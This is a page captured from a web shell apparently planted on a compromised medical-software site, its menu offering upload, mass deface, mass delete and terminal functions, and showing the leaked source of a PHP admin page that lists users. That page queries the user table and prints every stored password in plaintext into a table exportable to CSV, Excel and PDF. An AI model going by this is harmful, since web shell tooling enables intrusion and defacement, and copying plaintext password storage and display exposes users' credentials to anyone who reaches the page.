UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
stmedicosoftware
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
list_userlist.php
<?php include "top1.php";?> <!-- /inner_content--> <div class="inner_content"> <!-- /inner_content_w3_agile_info--> <!-- breadcrumbs --> <div class="w3l_agileits_breadcrumbs"> <div class="w3l_agileits_breadcrumbs_inner"> <ul> <li><a href="dashboard.php">Dashboard</a><span>«</span></li> <li>App Register User List</li> </ul> </div> </div> <!-- //breadcrumbs --> <div class="inner_content_w3_agile_info two_in"> <table width="100%"> <tr> <td width="70%"> <h2 class="w3_inner_tittle">USER LIST</h2> </td> <td width="30%" align="right"><a href="add_user.php" class="btn btn-primary"><i class="fa fa-plus"></i> Add User</a></td> </tr> </table> <!--/forms--> <table id="example1" class="table table-striped table-bordered"> </table> <div class="forms-main_agileits"> <div class="form-body" style="overflow-x:auto;"> <?php $sql= "Select * from userdetailstb"; $result=mysqli_query($conn, $sql) or die("Query Failed."); if (mysqli_num_rows($result)>0) { ?> <table id="studtable" class="table table-striped table-bordered"> <thead> <tr> <th>S.No.</th> <th>Name</th> <th>Mobile No.</th> <th>UserName</th> <th>Password</th> <th>Userrole</th> <th>Edit</th> <th>Status</th> </tr> </thead> <tbody> <?php $serial= 1; while ($row = mysqli_fetch_assoc($result)) { ?> <tr> <td><?php echo $serial;?></td> <td><?php echo $row['uname'];?></td> <td><?php echo $row['mobileno'];?></td> <td><?php echo $row['username'];?></td> <td><?php echo $row['userpassword'];?></td> <td><?php echo $row['permissiontype'];?></td> <td> <a href='add_user.php?id=<?php echo $row["userdetailsid"]; ?>&op=<?php echo "Edit"; ?>'><i class=" glyphicon glyphicon-pencil"></i> Edit</a> </td> <td> <?php if($row['active']=="1") { ?> <a href='add_user.php?id=<?php echo $row["userdetailsid"]; ?>&op=<?php echo "Active"; ?>'><i class=" glyphicon glyphicon-pencil"></i> Active</a> <?php } else { ?> <a href='add_user.php?id=<?php echo $row["userdetailsid"]; ?>&op=<?php echo "DeActive"; ?>'><i class=" glyphicon glyphicon-pencil"></i> DeActive</a> <?php } ?> </td> </tr> <?php $serial++; } } ?> </tbody> </table> </div> </div> </div> <!-- //inner_content_w3_agile_info--> </div> <!-- //inner_content--> </div> <!-- banner --> <!-- //inner_content--> <head> <link href="style.css" rel="stylesheet" type="text/css" /> <script src="vendor/jquery/jquery-3.2.1.min.js" type="text/javascript"></script> <link rel="stylesheet" href="vendor/DataTables/jquery.datatables.min.css"> <script src="vendor/DataTables/jquery.dataTables.min.js" type="text/javascript"></script> <link rel="stylesheet" href="vendor/DataTables/buttons.datatables.min.css"> <script src="vendor/DataTables/dataTables.buttons.min.js" type="text/javascript"></script> <script src="vendor/DataTables/jszip.min.js" type="text/javascript"></script> <script src="vendor/DataTables/pdfmake.min.js" type="text/javascript"></script> <script src="vendor/DataTables/vfs_fonts.js" type="text/javascript"></script> <script src="vendor/DataTables/buttons.html5.min.js" type="text/javascript"></script> </head> <script type="text/javascript"> $(document).ready(function() { $("#studtable").DataTable({ bLengthChange: true, "iDisplayLength": 10, bInfo: false, responsive: true, "bAutoWidth": false, dom: 'lBfrtip', buttons: [{ extend: 'copy', attr: { id: 'allan' } }, 'csv', 'excel', 'pdf'] }); }); </script> <?php include "footer.php";?>
Copyright © 2025 - UnknownSec